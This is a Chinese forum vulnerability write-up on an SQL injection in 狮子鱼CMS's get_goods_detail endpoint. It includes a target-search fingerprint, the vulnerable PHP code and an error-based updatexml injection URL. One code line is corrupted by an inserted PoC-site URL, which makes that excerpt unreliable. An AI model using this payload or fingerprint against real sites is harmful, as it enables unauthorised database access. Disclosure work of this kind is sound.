问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
狮子鱼CMS ApigoodController.class.php SQL注入漏洞
# 狮子鱼CMS ApigoodController.class.php SQL注入漏洞 ## 漏洞描述 狮子鱼CMS ApiController.class.php 参数过滤存在不严谨,导致SQL注入漏洞 ## 漏洞影响 狮子鱼CMS ## 网络测...
狮子鱼CMS ApigoodController.class.php SQL注入漏洞 ========================================== 漏洞描述 ---- 狮子鱼CMS ApiController.class.php 参数过滤存在不严谨,导致SQL注入漏洞 漏洞影响 ---- 狮子鱼CMS 网络测绘 ---- "/seller.php?s=/Public/login" 漏洞复现 ---- 登录页面如下  存在漏洞的文件为 `ApigoodsController.class.php` , 关键位置为 ```php public function get_goods_detail() { $id = I('get.id'); $pin_id = I('get.pin_id', 0); $token = I('get.token'); $weprogram_token = M('weprogram_token')->field('member_id')->where( array('token' =>$token) )->find(); $member_id = $weprogram_token['member_id']; $need_data = array(); $sql = "select g.*,gd.description,gd.is_untake_level,level_discount,gd.video_src,gd.video_size_width,gd.vedio_size_height,gd.is_video, gd.summary,gd.share_title,gd.activity_summary,gd.tag from " . C('DB_PREFIX') . "goods g," . C('DB_PREFIX') . "goods_description gd where g.goods_id=gd.goods_id and g.goods_id=" . $id; $goods = M()->query($sql); $pin_model = D('Home/Pin'); $goods_model = D('Home/Goods'); $qian = array( "/Uploads/image" ); $c_site_url = str_replace('/dan','',C('SITE_URL')); $hou = array( $c_site_url . "/Uploads/image" ); $goods[0]['video_src'] = C('SITE_URL')."Uploads/http://peiqi-wiki-poc.oss-cn-beijing.aliyuncs.com/vuln/".$goods[0]['video_src']; $goods[0]['description'] = str_replace($qian, $hou, $goods[0]['description']); $goods[0]['description'] = htmlspecialchars_decode($goods[0]['description']); $qian = array( "\r\n" ); ```  漏洞测试为 ```plain https://xxx.xxx.xx.xxx/index.php?s=apigoods/get_goods_detail&id=1%20and%20updatexml(1,concat(0x7e,md5(1),0x7e),1) ``` 
发表于 2024-07-12 18:43:58
阅读 ( 1714 )
分类:
CMS
0 推荐
收藏
0 条评论
请先
登录
后评论
带头大哥
456 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!
